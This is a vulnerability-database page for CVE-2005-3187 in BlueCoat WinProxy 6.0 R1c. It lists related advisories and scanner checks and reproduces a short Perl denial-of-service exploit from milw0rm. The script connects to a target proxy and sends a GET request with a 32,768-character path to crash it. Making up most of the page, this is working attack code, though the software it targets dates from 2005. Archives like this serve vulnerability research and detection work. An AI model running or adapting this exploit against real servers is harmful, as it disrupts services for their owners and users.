Lucene search
+L

BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 36 Views

BlueCoat WinProxy Denial of Service Exploi

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit
7 Jan 200600:00
zdt
nessus
Tenable Nessus
WinProxy < 6.1a Multiple Vulnerabilities
6 Jan 200600:00
nessus
nessus
Tenable Nessus
WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)
10 Jan 200600:00
nessus
nessus
Tenable Nessus
WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities
10 Jan 200600:00
nessus
cve
CVE
CVE-2005-3187
5 Jan 200623:00
cve
cvelist
Cvelist
CVE-2005-3187
5 Jan 200623:00
cvelist
exploitdb
Exploit DB
BlueCoat WinProxy 6.0 R1c - GET Denial of Service
7 Jan 200600:00
exploitdb
euvd
EUVD
EUVD-2005-3186
7 Oct 202500:30
euvd
exploitpack
exploitpack
BlueCoat WinProxy 6.0 R1c - GET Denial of Service
7 Jan 200600:00
exploitpack
nvd
NVD
CVE-2005-3187
31 Dec 200505:00
nvd
Rows per page

                                                #!perl
#
# &#34;WinProxy 6.0 R1c&#34; Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = &#39;127.0.0.1&#39;;

#
# destination TCP port
#
$port = 80;


print &#39;&#34;WinProxy 6.0 R1c&#34; Remote DoS Exploit&#39;.&#34;\n\n&#34;;

$sock = IO::Socket::INET-&#62;new
(

    PeerAddr =&#62; $ip,
    PeerPort =&#62; $port,
    Proto    =&#62; &#39;tcp&#39;,
    Timeout  =&#62; 2

) or print &#39;[-] Error: Could not establish a connection to the server!&#39; and exit(1);

print &#34;[+] Connected.\n&#34;;

$sock-&#62;send(&#39;GET /&#39;. &#39;A&#39; x 32768 .&#34; HTTP/1.1\r\n\r\n&#34;);

print &#34;[+] DoS string has been sent.&#34;;

close($sock);

# milw0rm.com [2006-01-07]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation